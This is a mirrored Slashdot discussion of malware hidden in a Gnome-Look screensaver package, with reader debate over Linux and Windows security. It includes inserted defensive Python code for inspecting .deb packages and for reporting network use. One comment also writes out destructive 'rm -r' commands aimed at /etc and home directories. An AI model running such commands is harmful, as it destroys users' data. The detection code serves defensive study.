Slashdot Mirror


Malware Found Hidden In Screensaver On Gnome-Look

AndGodSed writes "OMG! Ubuntu! reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instructions on cleansing your system.

97 of 611 comments

  1. Not more safe by sopssa · · Score: 3, Insightful

    It's been told to all the Linux zealots so many times that Linux itself isn't really more secure against malware than Windows. It's only so because its market share is like 0.5%, if even that, and it makes much more sense to make malware where the (non-geeky) users are.

    This just shows that if ever Linux did gain enough market share with casual people, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.

    The funny thing about this is the same as with Mac OS X users. All of the zealots yelling that Linux/Mac OS X are secure against malware, which results in normal people thinking they can run whatever they downloaded "because my OS is secure!".

    And before everyone jumps on the "but you can't get infected just by browsing porn sites on Linux!", why not? When was the last time you got infected by a Windows vulnerability? Those attacks are usually against 3rd party programs like PDF or Flash. And guess what, those apps are on Linux too and are just as exploitable.

    The only reason malware problems are smaller on Linux than on Windows is the almost non-existent desktop market share and the fact that those who use it on the desktop are usually more tech savvy.

    This just shows that if Linux had 95% market share on the desktop, and Windows 0.5%, it would be the same thing but just turned around.

    1. Re:Not more safe by nschubach · · Score: 5, Insightful

      The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so...

      It's not more secure because of its market share, it's more secure because anyone can fix it.

      --
      Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
    2. Re:Not more safe by phantomcircuit · · Score: 3, Insightful

      This just shows that if ever Linux did gain enough market share with casual people, the malware problem will be there too. Repositories won't help with that, because people want 3rd party programs and games.

      Well that's why the goal is to get as much of the third party software into the repository as possible.

    3. Re:Not more safe by Anonymous Coward · · Score: 5, Insightful

      All it shows is that Linux is vulnerable to trojan horses. ALL operating systems are vulnerable to trojan horses. When you show me a Linux or OS X computer that's vulnerable to something like the slammer worm, get back to me.

    4. Re:Not more safe by Suiggy · · Score: 2, Insightful

      I agree. The best software in the world can't protect itself from clueless ignorant users who don't know any better. The more clueless, ignorant users using the software, the higher the rate of occurrence of exploitation. If Linux were to become as popular as Windows, I guarantee it would have just as many problems as Windows users currently suffer from.

    5. Re:Not more safe by sopssa · · Score: 4, Insightful

      But that still requires distros to inspect and validate the patches before they go live to repositories. The big part isn't really fixing the code, it's to test that it surely works and doesn't cause problems for users.

      And even so, if the vulnerability is in, let's say, Flash, neither just anyone nor the distros can fix that closed-source application.

    6. Re:Not more safe by _merlin · · Score: 5, Interesting

      It looks like it's following the same pattern as Windows malware, too: make a cool screensaver, post it to sharing sites, hope people tell their friends about it. That was a common malware vector for Windows in the early part of this decade. Next there'll be dodgy "codecs" on pr0n sites, and once people start using malware scanners for Linux, they'll make dodgy fake antivirus software to con gullible users. Netbooks may be great for attracting attention to Linux, but we have to remember that this will include the kind of attention that no-one wants.

    7. Re:Not more safe by sbeckstead · · Score: 5, Insightful

      Wrong, anyone can not fix it. Any one MAY fix it.

      Only the tech savvy programmer types that care enough to fix can fix it.

    8. Re:Not more safe by Anonymous Coward · · Score: 5, Interesting

      You kind of have a point, but the fact is, you need root privileges to install a .deb, and I have quite successfully installed gtk/gtk2 themes/icons/etc. without admin privileges. If I downloaded a .deb from a random site and then installed it, it would be just like running a .exe on Windows, but for most things I need to do on Linux, I don't actually have to take that risk, while on Windows it seems everything is a .exe. Not sure about screensavers, but it seems this was, like 90% of viruses for any platform, a hack relying on stupid users elevating the virus to root authority themselves.

      Repositories are getting a lot better too. I don't use Ubuntu any more, but when I left, the PPA was in the ascendancy, which seemed to allow much better enforcement of security while still letting 3rd party stuff in.

    9. Re:Not more safe by _merlin · · Score: 5, Insightful

      Malware doesn't need to exploit vulnerabilities in the software: it only needs vulnerable users. There is no way to patch that.

    10. Re:Not more safe by sopssa · · Score: 2, Interesting

      Any (good) Linux sysadmin knows that there have been many Linux worms in history. Yes, history. You're also referring to a 2003 Windows worm here.

      Conficker aside, such worms are pretty much history. Most malware nowadays comes via trojans, and no OS can protect against that unless it's totally locked down (like the iPhone).

    11. Re:Not more safe by amasiancrasian · · Score: 5, Insightful

      I've been telling many the same thing, but with one exception: Mac and *nix started out with a better permissions system, and therefore users who have downloaded an app from the Internet have been trained to be doubly sure about whatever it is that requires sudo power (e.g., the Mac sudo GUI prompt). Microsoft UAC, on the other hand, has had to deal with transitioning software developers to not write in "Program Files" and other public areas and to save data to personal home folders.

      While I'll agree with you that Mac/*nix are not any more secure than Windows, the Mac/*nix users have been taught to take a sudo prompt seriously, while in the early stages and growing pains of UAC, Windows users were easily annoyed by UAC prompts and therefore took the UAC prompts less seriously, because UAC prompts were being triggered by transitioning software developers that did not save data in the user's home folder.

      In the end, the security of any system relies on the ability of the user to authenticate and verify downloaded software. But making it more difficult, such as requiring an administrator password to be entered for elevated privileges, makes users more cautious of software requiring a sudo prompt. And while that's not inherently any more secure, at least users think twice before entering their password.

    12. Re:Not more safe by nschubach · · Score: 5, Insightful

      The Flash player isn't open source. The Compiler is, the player is not. As I said, the idea behind open source being more secure is that you could have potentially thousands of different solutions to prevent this thing in the future. The best one is chosen and patched into the main tree. If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday." Even if a patch comes in that resolves that problem, it could have been the first solution to said problem and might have problems itself that will need to be fixed later.

      It's really the potential quantity of solutions to the problem.

      I could argue with you that this vulnerability might have been fixed sooner with more market share.

      --
      Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
    13. Re:Not more safe by kai_hiwatari · · Score: 5, Insightful

      This particular malware is not because of a security problem with the OS. It is more of a social engineering thing - trying to trick unsuspecting users to install a malicious script by hiding it as a theme or screensaver.

    14. Re:Not more safe by sopssa · · Score: 4, Informative

      But this is not really about vulnerabilities. This is a screensaver that user downloads from a website. Open source or not, you can't fix that unless the whole system is totally locked down like iPhone. And that doesn't really sound good.

    15. Re:Not more safe by nschubach · · Score: 2, Insightful

      But there is a way to minimize the impact, correct? Take this vulnerability for example. It might have had an effect on just the one user, but it wasn't going to be able to infect the system folder...

      Windows is getting better with this, but a Windows user still has more potential system destructive powers than an equivalent Linux user.

      --
      Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
    16. Re:Not more safe by sopssa · · Score: 4, Informative

      But so what if it only gets access to one user? Malware doesn't really need root access. Stealing user data and sending spam is just as possible from a user account. In history malware tried to just fuck over the computer, which would have required root access, but now it's just about sending spam or stealing data.

    17. Re:Not more safe by NoobixCube · · Score: 4, Insightful

      Mod parent up. I know he's AC, but the point he makes is still good: There is no amount of security that can protect your machine from a clueless user.

      When you install a theme the normal way, you just drag the archive file - that is to say, no executable parts, or any way to make the parts executable - into the theme manager, and presto, it's installed and it asks if you want to apply it. This doesn't require root privileges because it installs to the user's personal themes folder within their home folder. When they do this, there's no way to sneak in a cron job (that's a scheduled task) or any other nasty automatically executing files. Installing from a .deb is usually unnecessary, and as this story proves, exposes your install to risk if you don't pay attention to what you're installing. In my opinion, Ubuntu, being the most newbie-visible Linux distro at the moment, has a responsibility to educate users on things like this. A PDF in their home folder, or a slide show that takes like ten minutes to go through, telling new users how Linux is different from Windows would work wonders, and take up virtually no space on the install disc. There's no excuse for there not being one.

      --
      Admit it. You post strawman arguments as AC so you get modded Insightful for refuting them, rather than Troll
    18. Re:Not more safe by at_slashdot · · Score: 5, Insightful

      You have a poor understanding of what "malware" is or what Linux/Mac zealots claim.

      Malware is a piece of code, all OSes run code, therefore all OSes are vulnerable to malware. What Mac and Linux "zealots" claim is that it's not likely to get malware in Linux/Mac just by browsing a site, opening an e-mail, or just by keeping the computer on and connected to the network -- that hasn't changed.

      "Repositories won't help with that, because people want 3rd party programs and games."

      I am happy with the 25,000+ programs available in the Debian repository; I never install random packages from the Internet. At least the basic packages should be available from the repos, so the risk is at least reduced if not eliminated (depending on the behavior of the user).

      In my experience people who use the word "zealot" lack arguments.

      --
      "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
    19. Re:Not more safe by sopssa · · Score: 2, Insightful

      The software ecosystem is "much more confusing" because it's an OS with 95% market share and there are millions of 3rd party programs and games for users. And they really want and need those.

      Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.

    20. Re:Not more safe by nurb432 · · Score: 5, Interesting

      Except one would hope that you could trust what you get from a site like this. Not everyone can scour the source/binary of every app they get from a 'trusted' site.

      And if you can't trust the 'trusted' sites for the free stuff, then the entire FreeOS movement is dead in its tracks.

      --
      ---- Booth was a patriot ----
    21. Re:Not more safe by nschubach · · Score: 3, Insightful

      You are arguing about ignorance of users, not the security of the OS...

      --
      Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
    22. Re:Not more safe by DragonWriter · · Score: 2, Interesting

      Most malware nowadays comes via trojans, and no OS can protect against that unless it's totally locked down (like the iPhone)

      There's a middle ground that can maximize protection against trojans (of course, nothing can protect against completely unwary users), and that's using a model where untrusted apps are (whether by running through app-specific accounts or otherwise) required to be given fairly finely grained permissions on installation before accessing resources.

      While Linux distros provided somewhat more protection against users being unknowingly tricked into performing dangerous tasks, by providing elegant, non-intrusive ways to give users the control they need without always running as a superuser, before Windows did much in that regard, Linux shares with Windows a fairly all-or-nothing security model in many regards that is particularly susceptible to trojans.

    23. Re:Not more safe by Goaway · · Score: 2, Interesting

      And thus you raise the threshold for entry for new third-party software.

    24. Re:Not more safe by nschubach · · Score: 2, Funny

      ... which has nothing to do with how secure the operating system is, but the profile itself.

      --
      Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
    25. Re:Not more safe by soundguy · · Score: 3, Informative

      Wrong. They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.

      --
      Nothing worthwhile ever happens before noon
    26. Re:Not more safe by vadim_t · · Score: 4, Insightful

      Sorry, this line of argument is stupid.

      You're basically arguing that you can't be more secure than Windows -- Windows' security is as good as things will ever get, and everything else only gets fewer viruses because it has less market share.

      But if so, why all the security advancements in the latest Windows versions? Why isn't it still using Win95-era security? Why did MS bother coding support for NX, UAC and so on? Well, because it turns out it's possible to do better. Current Windows versions are vastly more locked down than Win95, because some design choices turned out to be stupid and vulnerable.

      Linux doesn't follow some common Windows security pitfalls, like having ActiveX and having the browser execute binaries from the net. It also doesn't have autorun. Just that closes several ways of compromising the system, therefore at least in that respect it's more secure. Of course it's not 100% impenetrable, but evidently there exist features and implementation details which make it easier or harder to compromise the system, so not all OSes are equally [in]secure, it depends on how they're implemented.

    27. Re:Not more safe by Anonymous Coward · · Score: 4, Insightful

      This particular malware is not because of a security problem with the OS.

      Except that if this was a Windows screensaver you can bet it would be blamed on the OS and not on the fact that it was a social engineering attack.

    28. Re:Not more safe by Anonymous Coward · · Score: 2, Insightful

      1. Something like a screensaver does not need root privileges to install, it can be unpacked to the user directory with just user rights.
      2. Even if installed centrally, the applications inside are still run with user privileges.
      3. If some application in the package requires setuid rights, it will be detected by the package manager.
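The story's description of a .deb that installs a root-run script, and the three points in comment 28 (a screensaver needs no root to install, packaged applications still run as the user, and setuid files are visible to the package manager), both come down to looking inside the package before dpkg runs it. What follows is an added example, not code from the story, from Gnome-Look, or from the malware write-ups it cites: a small Python inspector that parses the ar container a .deb is built from, lists the maintainer scripts that dpkg would execute as root, and flags cron/init paths and setuid/setgid bits in the payload. The sample package, its file names and its contents are constructed for the example and do not describe the real screensaver.

```python
"""Inspect a .deb without installing it: maintainer scripts, risky paths, setuid files.

Added example, not code from the story or the project. A .deb is an 'ar' archive holding
debian-binary, control.tar.* (maintainer scripts such as postinst, which dpkg runs as root)
and data.tar.* (the files that land on disk). The sample package is constructed in memory.
"""
import io
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Payload locations that have no business in a screensaver or theme package.
RISKY_PREFIXES = ("./etc/cron", "./etc/init.d", "./etc/rc", "./etc/profile.d", "./etc/sudoers")
SETUID_BITS = 0o6000  # setuid | setgid


def parse_ar(blob: bytes) -> dict:
    """Parse the classic 'ar' container. Returns {member name: member bytes}."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar member header")
        name = hdr[0:16].decode("ascii").rstrip(" /")  # GNU ar may write 'name/'
        size = int(hdr[48:58].decode("ascii"))
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)  # members are 2-byte aligned
    return members


def _member(members: dict, prefix: str) -> bytes:
    for name, content in members.items():
        if name.startswith(prefix):
            return content
    raise ValueError(f"no {prefix}* member in package")


def inspect_deb(blob: bytes) -> dict:
    """Return maintainer scripts, risky payload paths and setuid/setgid files in a .deb."""
    members = parse_ar(blob)
    report = {"maintainer_scripts": {}, "risky_paths": [], "setuid_files": []}
    with tarfile.open(fileobj=io.BytesIO(_member(members, "control.tar")), mode="r:*") as ctl:
        for m in ctl.getmembers():
            base = m.name.lstrip("./")
            if m.isfile() and base in MAINTAINER_SCRIPTS:
                report["maintainer_scripts"][base] = ctl.extractfile(m).read().decode(errors="replace")
    with tarfile.open(fileobj=io.BytesIO(_member(members, "data.tar")), mode="r:*") as data:
        for m in data.getmembers():
            path = m.name if m.name.startswith("./") else "./" + m.name.lstrip("/")
            if path.startswith(RISKY_PREFIXES):
                report["risky_paths"].append(path)
            if m.isfile() and m.mode & SETUID_BITS:
                report["setuid_files"].append(path)
    return report


def _targz(entries) -> bytes:
    """Build an in-memory .tar.gz from (path, content, mode) tuples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content, mode in entries:
            info = tarfile.TarInfo(path)
            info.size, info.mode = len(content), mode
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def _ar(members) -> bytes:
    """Write an 'ar' archive from (name, content) pairs."""
    out = bytearray(b"!<arch>\n")
    for name, content in members:
        out += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(content):<10}`\n".encode("ascii")
        out += content + (b"\n" if len(content) & 1 else b"")
    return bytes(out)


def build_sample_deb() -> bytes:
    """Constructed sample: looks like a screensaver but carries a root-run postinst,
    a cron entry and a setuid helper. Names and contents are made up for this example."""
    control = _targz([
        ("./control", b"Package: waterfall-screensaver\nVersion: 1.0\nArchitecture: all\n", 0o644),
        ("./postinst", b"#!/bin/sh\n# constructed sample: dpkg runs this as root at install time\nexit 0\n", 0o755),
    ])
    data = _targz([
        ("./usr/share/backgrounds/waterfall.jpg", b"(constructed image bytes)", 0o644),
        ("./etc/cron.d/waterfall", b"# constructed sample cron entry\n", 0o644),
        ("./usr/bin/waterfall-helper", b"#!/bin/sh\nexit 0\n", 0o4755),
    ])
    return _ar([("debian-binary", b"2.0\n"), ("control.tar.gz", control), ("data.tar.gz", data)])


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_deb()
    for key, value in inspect_deb(blob).items():
        print(f"{key}: {value}")
```

Run it with the path to a .deb to inspect a real package; with no argument it inspects the constructed sample. For a screensaver or theme, the presence of any maintainer script is already the thing to refuse: dpkg runs it with root privileges regardless of whether anything in the payload is setuid, which is why the unprivileged drag-and-drop theme install that several commenters describe is the safer route.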

    29. Re:Not more safe by digitalunity · · Score: 4, Interesting

      Here's an idea. Feel free to agree, disagree, tear it apart, whatever...

      Why not have a kernel network access logging module with a userland process that periodically reports to users which programs are accessing the TCP/IP network? Say once a week or once a month or something. The number of programs that do this for many users is quite low. Probably Firefox, Thunderbird, Opera, uTorrent, a short list of other programs. Users then have an opportunity to ignore those programs on future reports. Users now have a good idea if there are changes to their system that might affect security.

      There would still be opportunity for malware to access the internet, but users would either 1) notice it or 2) it would make the malware work in very complicated, noticeable ways (like uploading data to a website using a URL).

      --
      You can't legislate goodness. Let each to his own destiny, by will of his freely made choices.
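One way to build the report the comment proposes, as an added example that is not from the post and not from any real kernel module: the logging hook is assumed to emit one line per outbound connection ("date program destination"), and the log below is constructed. The reporter groups connections per program for the period, compares with the previous period, and separates programs the user has already chosen to ignore from ones that appeared for the first time, which is the "changes to their system" signal the comment is after.

```python
"""Periodic 'which programs used the network' report over constructed log lines.

Added example, not code from the comment. The assumed log format is
"<ISO date> <program> <destination host:port>", one line per outbound connection.
"""
from collections import defaultdict
from datetime import date, timedelta

# Constructed sample log for the example; hosts use reserved example names/addresses.
SAMPLE_LOG = """\
2009-12-01 firefox www.example.org:443
2009-12-02 thunderbird mail.example.org:993
2009-12-03 firefox www.example.org:443
2009-12-08 firefox www.example.org:443
2009-12-09 utorrent tracker.example.net:6969
2009-12-10 waterfall-screensaver updates.example.invalid:80
2009-12-10 waterfall-screensaver 192.0.2.10:80
2009-12-11 thunderbird mail.example.org:993
"""


def parse_log(text: str):
    """Return (day, program, destination) tuples, skipping blanks and comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        day, program, dest = line.split(maxsplit=2)
        records.append((date.fromisoformat(day), program, dest))
    return records


def summarize(records, start: date, end: date) -> dict:
    """Per-program connection count and distinct destinations for start <= day < end."""
    summary = defaultdict(lambda: {"connections": 0, "destinations": set()})
    for day, program, dest in records:
        if start <= day < end:
            summary[program]["connections"] += 1
            summary[program]["destinations"].add(dest)
    return dict(summary)


def periodic_report(records, period_end: date, ignored=frozenset(), days: int = 7) -> dict:
    """Report for the period ending at period_end: programs the user already acknowledged,
    programs also seen in the previous period, and programs seen for the first time."""
    start = period_end - timedelta(days=days)
    current = summarize(records, start, period_end)
    previous = summarize(records, start - timedelta(days=days), start)
    report = {"ignored": {}, "seen_before": {}, "new": {}}
    for program, stats in current.items():
        if program in ignored:
            bucket = "ignored"
        elif program in previous:
            bucket = "seen_before"
        else:
            bucket = "new"
        report[bucket][program] = stats
    return report


def format_report(report: dict) -> str:
    """Plain-text rendering, new programs first so they are what the user reads."""
    labels = (("new", "NEW programs, please review"),
              ("seen_before", "Also seen in the previous period"),
              ("ignored", "Acknowledged earlier"))
    lines = []
    for bucket, label in labels:
        lines.append(f"== {label} ==")
        for program, stats in sorted(report[bucket].items()):
            dests = ", ".join(sorted(stats["destinations"]))
            lines.append(f"  {program}: {stats['connections']} connection(s) to {dests}")
    return "\n".join(lines)


def sample_report() -> dict:
    """The weekly report for the constructed log, with firefox already acknowledged."""
    return periodic_report(parse_log(SAMPLE_LOG), date(2009, 12, 15), ignored={"firefox"})


if __name__ == "__main__":
    print(format_report(sample_report()))
```

In the constructed log the screensaver shows up as a new program with two destinations in the same week it was installed, which is exactly the kind of entry the comment expects a user to notice. The ignore list only suppresses programs by name, so a defender would also want to alert when an acknowledged program starts talking to destinations it never used before.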
    30. Re:Not more safe by mR.bRiGhTsId3 · · Score: 3, Interesting

      I'm sorry, you have no idea what you are talking about. Sudo is not an implicit privilege gain. You have to manually request elevation. The reason it looks implicit is because all of the applications that ever need elevated privileges come with launchers that do the work for you. Sudo can also be configured to function the same as su (OpenSUSE ships it that way, I believe). The same is true of the new PolicyKit. Similarly, Vista is not an implicit elevation either. The continue prompt only occurs for administrator accounts because they are flagged with a token on login that marks them as administrators. They are required to manually take action. Furthermore, this function can be disabled in group policy in order to force a password entry in the same way that non-admin users have to authenticate to perform system changes. The only reason it occurs automatically is through application manifests and heuristics. Both of these cases are explicit elevations at the behest of the application author that the user can approve or cancel.

    31. Re:Not more safe by isorox · · Score: 3, Interesting

      Actually it would really suck if Windows had just one Microsoft verified "app store" where everything is controlled like with iPhone.

      Yes it would, and in this world I would add the Google repository, and perhaps the Apple repository. Anyone could set up a repository (same as you can with Debian), and sign their packages, but if they got compromised, or let crap in, then I'd be wary of using them in the future.

      The problem with the iPhone App Store is there's only one. You can't add a competitor's.

    32. Re:Not more safe by Anonymous Coward · · Score: 4, Insightful

      The reason most Windows-based PCs are infected is also due to the ignorance of users. I haven't had a virus or malware attack in years because I keep my antivirus program up to date, I don't visit sites that are prone to malware, and I use safe searching habits. The people who are constantly asking me to fix their computers are the ones who don't follow these strategies.

    33. Re:Not more safe by Voulnet · · Score: 4, Insightful

      If you have the source, you can do this in a few minutes (or put in your own temporary patch) with the proper skill and be back up and more secure than someone waiting for "Patch Tuesday."

      If you want Linux to grow and reach more people, as opposed to being a geek niche, then you should forget about requiring people to have the skills necessary to patch the source. Emergence of malware means only one thing: Linux is growing in popularity. Now, if we wish for its popularity to prosper then we should use the normal user's perspective a little bit; you know, people who can't patch the source and compile it by themselves.

    34. Re:Not more safe by LinuxIsGarbage · · Score: 2, Funny

      I always tell users to only download software from sites like Softpedia or Download.com. Plus you get the "choice" of what site you want. And we all know that choice is a good thing!

    35. Re:Not more safe by nschubach · · Score: 4, Insightful

      I have a Windows machine which has been running just fine for years, but that doesn't mean that it's just as secure. If I do get a virus on that machine, there's a greater chance I will be rebuilding it opposed to my Linux machine.

      --
      Every time I start to have faith in humanity, I ruin it by driving to work between 7 and 8 am.
    36. Re:Not more safe by Anonymous Coward · · Score: 2, Insightful

      the "secret" vulnerabilities will be fixed on OSS, while they still exist in secret source software.

      Huh? In either case, they only get fixed if someone finds them and reports them as bugs. Users are not expected to be OS and kernel developers/experts. But even then, you have to deal with users who don't patch their systems.

      Conficker worm:

      Vulnerability patched: October 23, 2008 (http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx)

      Worm seen in wild: November 2008, and still spreading to this day

      I wonder if the press gave MS a pass on this, since they had already patched it before the first report of the worm was logged. If the tables were reversed I'll bet 100% of Slashdot and the other online Linux cheerleaders would claim it wasn't the fault of any distro. You'd see snide posts like
      "Unpatched computers get infected. News at 11", "Idiots who don't patch their system get infected", etc. No, it's not a strawman, it's an informed opinion ;)

    37. Re:Not more safe by bcmm · · Score: 2, Insightful

      In history malware tried to just fuck over the computer which would had required root access

      (If I didn't have backups) I would rather you ran rm -r /etc/ than rm -r ~/ on my box.

      --
      # cat /dev/mem | strings | grep -i llama
      Damn, my RAM is full of llamas.
    38. Re:Not more safe by phantomfive · · Score: 4, Informative

      Not by anyone intelligent. The difference between Windows and Linux is how easy it is to remove stuff like this on Linux. It's easy on Linux. Sometimes practically impossible on windows.

      --
      Qxe4
    39. Re:Not more safe by kenshin33 · · Score: 2, Funny

      Well, I'm not questioning sudo per se (it's useful) and yes, you can manage its use. What I call implicit (less explicit would be more accurate) is the way Ubuntu (maybe other distros too, I don't know, I'm a Gentoo user) uses it. Yes, you have to enter a password, but opening a terminal and typing "su" (or sudo for that matter) is more explicit, meaning you won't do it just for pleasure, and therefore most likely you know what you're about to do. Any app that wants root privileges can pop up a window (gksu, gksudo). While it's convenient, it's more dangerous. Most people don't actually read carefully before clicking.

    40. Re:Not more safe by thejynxed · · Score: 3, Informative

      In this day and age, if your machine gets compromised by a virus, trojan, or rootkit, the only sensible thing to do is wipe and reinstall from a known clean backup. It doesn't matter what OS it is. There's no telling what other little friends they brought along that your chosen methods of detection didn't find. It's not really an option anymore to keep on going with a system that was compromised.

      There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.

      --
      @Mindless Drivel: 100% of Twitter posts ever Tweeted.
    41. Re:Not more safe by Dog-Cow · · Score: 2, Informative

      Windows NT 3.5 existed at the same time as Windows 3.1 and had most of the same security features as Windows 7. The NX bit had not been implemented by Intel, so it couldn't support that, and the UAC stuff is not really needed for security. It's just a shortcut for getting admin privs without logging in as admin.

      Really the recent changes in Windows security have been in guiding the user to more secure practices, such as not logging in as admin.

    42. Re:Not more safe by mysidia · · Score: 2, Interesting

      Both. You are imagining a false dichotomy where there is none.

      Getting as much of the 3rd party software as possible into the repository does not preclude raising the threshold of entry.

      Some software you want to fall below the threshold is no-name drive-by malware.

    43. Re:Not more safe by Jon.Laslow · · Score: 3, Insightful

      "...or a slide show that takes like ten minutes to go through..."

      Did you just seriously suggest that Ubuntu include a ten minute presentation for users to watch? As in, no sarcasm there? Do you honestly expect anyone to actually sit through that? Most people don't have the attention span to sit through the multilingual Welcome video OS X shows on first-boot without trying to skip it, let alone something that talks about security for ten minutes. Remember, if you can't make the user care enough to look in the address bar to see if the 'PayPal' link sent to them in an email is actually legit, you aren't going to make them care enough to sit through ten minutes of tedium after their install is done.

    44. Re:Not more safe by Anonymous Coward · · Score: 2, Interesting

      So what? On my system no script or program can be executed without my knowledge. Programs cannot access anything outside of specific directories. They are totally ironed and sealed off from each other.

      For example, I cannot even open a picture from any directory other than the ~/Pictures directory. And the only application that can do that is Gwenview.
      The only place to run any script (or binary executable) from is ~/bin, but it first needs to be profiled to do so. So I can copy whatever binaries to that directory and they cannot be executed if I do not give permission first from the admin profile.

    45. Re:Not more safe by mr+exploiter · · Score: 2, Interesting

      The argument is still the same. I'd rather be able to tell someone who can that they may than tell them they may not.

      Anyone can try to fix it. Some may be better than others, but that doesn't preclude someone from trying. Whereas, on competing systems you may not.

      This argument is starting to look stupid, especially in a story like this.

      Any software that I use has to be made by someone I trust, there is no escape from that, no "but the source is available". I have to trust the maker.

      And giving excuses instead of assuming responsibility is not going to gain my trust. There have to be concrete steps to assure this doesn't happen again. No excuses.

    46. Re:Not more safe by Rockoon · · Score: 2, Funny

      No I am not. You have assumed there is a false dichotomy because you imagine repository resources to be infinite.

      The argument is that people want 3rd party software, ergo if the repository does not have it then people will go somewhere else for it.

      The response to this point is that repositories strive to have as much 3rd party software as possible on them. This would be fine and dandy if there is no raised entry bar, because there could theoretically be enough resources to host every 3rd party program that exists (for instance, Google could.)

      But you have imagined a world where there are also enough human resources to maintain that raised entry bar (humans looking over source code, accepting and rejecting programs based on what they are programmed to do) while also overcoming the need to download 3rd party programs from someplace else.

      If Linux had 95% market share, no software repository on the planet could keep up with the *submissions* to it while also maintaining that raised bar of yours, because they simply cannot allocate enough humans to the task.

      --
      "His name was James Damore."
    47. Re:Not more safe by LordLimecat · · Score: 5, Insightful

      If gnome-look is hosting .debs and not reviewing them, it seems to me like they're inviting disaster.

    48. Re:Not more safe by Goaway · · Score: 3, Insightful

      We are not. The whole point is that there is one actual human user, and thus there is zero difference if the malware can spread to other users or not, since it has already infected 100% of the available users.

    49. Re:Not more safe by oatworm · · Score: 2, Insightful

      Except if the screensaver happens to have some other program attached to the installation package, it'll be installed with root privileges without you knowing about it. Once that happens, you're done - it can rename system files, replace existing system files with its own 'dirty' files, or do anything else that root can do (i.e. practically anything), including preventing you from ever uninstalling it. They don't call it a "rootkit" because it first came out on Windows.

    50. Re:Not more safe by Thinboy00 · · Score: 5, Interesting

      My mother managed to get some nearly-impossible-to-remove scareware on her (Windows) netbook. She swears up and down that she never visited any sketchy sites, had AV (but no anti-malware), etc. She was basically using it for several things:
      1) Visiting various newspapers' websites
      2) Webmail (a dedicated server for her business)
      3) Word processing (OpenOffice.org)
      4) Spider Solitaire
      5) A few online games (jigsaw puzzles, sudoku, presumably flash-based) she found on Google. I think this is the most likely vector, but she uses the same websites all the time.
      6) Visiting certain reputable, ad-free (AFAIK) sites.
      She is smart enough to never download/run/open suspicious programs/files/etc. and she was using Firefox 3.5. This thing was able to prevent itself from being uninstalled easily. On Linux, she could have simply killed any offending processes (O.K. that's nontrivial, but no root permissions needed in theory) and checked the (graphical, so-easy-to-use-a-caveman^H^Hgrandma-could-do-it) Gnome startup programs tool for suspicious entries. On Windows, we eventually had to use "System Restore" (an OS feature) -- which the program could potentially have disabled had the malware author thought to do so (it was totally rooted -- the malware was preventing the installation of some anti-malware programs) and then download the anti-malware program that had previously failed to install. Windows Vista/7 are probably more secure than XP, which she has, but I'm still reluctant to blame all Windows security issues on user stupidity. Now I have her running Firefox+NoScript so that it (hopefully) won't happen again, but that's mostly because she refuses to switch to Linux. Most users would be running IE7 or so... not Firefox+NoScript. This is clearly not just "user stupidity" -- it's a Windows genuine advantage^H^Hbug.

      --
      $ make available
    51. Re:Not more safe by Thinboy00 · · Score: 5, Insightful

      There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.

      AVs don't get "distracted" -- either the real payload is detectable by the AV, in which case the distraction won't be successful since both will be found and removed, or else the real payload is undetectable, in which case you don't need the distraction at all, and as a matter of fact it hurts you by making the user more security-conscious.

      --
      $ make available
    52. Re:Not more safe by Waffle+Iron · · Score: 3, Funny

      I was going to comment on your post, but I've set my system to allow the browser to send only 100 cha

    53. Re:Not more safe by Fractal+Dice · · Score: 3, Insightful

      That's not the lesson I see. To me it says that a user-based security model is insufficient - apps are too free to call/use each other - the threat has moved from "rooting a box" to "rooting a user". OSes (and users) need to start looking at the user as a system administrator of many threads of personal data.

      Web browsers have already discovered much of this - different tabs on your web browser are like different apps and just as a sysadmin cannot trust all the users to play nice with each others' data, users can't trust different apps with full access to all other apps.

    54. Re:Not more safe by Intron · · Score: 5, Insightful

      The idea behind it is so that someone will put out a patch for said vulnerability without having to wait for parent company to do so....

      It turns out that I have patched a serious vulnerability in Linux. Please download and install my patch as root on your system.

      Sincerely,
      Someone

      --
      Intron: the portion of DNA which expresses nothing useful.
    55. Re:Not more safe by phantomfive · · Score: 4, Insightful

      If you want Linux to grow and reach more people, as opposed to being a geek niche,

      I don't.

